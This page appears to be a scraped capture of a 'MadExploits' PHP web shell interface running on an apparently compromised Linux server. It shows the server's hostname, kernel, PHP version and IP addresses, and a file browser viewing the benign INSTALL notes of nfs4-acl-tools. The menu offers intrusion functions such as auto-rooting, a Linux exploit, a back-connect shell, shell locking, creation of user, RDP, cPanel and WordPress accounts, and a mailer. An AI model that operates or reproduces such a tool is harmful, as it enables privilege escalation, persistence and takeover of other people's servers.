Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
nfs4-acl-tools-0.3.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
COPYING
45.74
KB
-rw-r--r--
INSTALL
1.63
KB
-rw-r--r--
README
167
B
-rw-r--r--
TODO
2.43
KB
-rw-r--r--
VERSION
115
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL
Installation: 1) to build and install the commandline tools (nfs4_getfacl, nfs4_setfacl): $ ./configure $ make $ make install 2) to build and install the GUI editor (nfs4-acl-editor), first do the above steps. then: $ cd GUI/nfs4-acl-editor $ qmake $ make $ cp nfs4-acl-editor <whatever-bin-path> the `qmake` step should generate a Qt-friendly Makefile. Note that the GUI editor depends upon Qt 4.1.4 or later, and needs to link against the file nfs4-acl-tools/libnfs4acl/libnfs4acl.a. 3) in case of trouble, please see "Random Notes" below or contact nfsv4@linux-nfs.org. Random Notes (about some distros..): the install targets "install-lib" and "install-dev", aren't actually wired-up. we're not yet sure whether to prune this entirely or come back and do it for real. looks for /usr/include/attr/attr.h, but 'attr' dir doesn't exist for me. after looking at the paths on my (old SuSE) system, i found that this worked: sudo ln -s /usr/include/linux /usr/include/attr a different environment is building the 'attr' package wrong. 1) doesn't install xattr.h, 2) isn't installing libattr.la, libattr.a, or libattr.so.1.1.0. W/r/t the latter, i saw errors like: libtool: link: cannot find the library `/usr/lib/libattr.la' or unhandled argument `/usr/lib/libattr.la' gmake[1]: *** [nfs4_getfacl] Error 1 make: *** [default] Error 2 if you have a libattr shared library and still see the above error, rerunning `configure' and `make' should probably fix the problem. please send any email to <nfsv4@linux-nfs.org>.
Close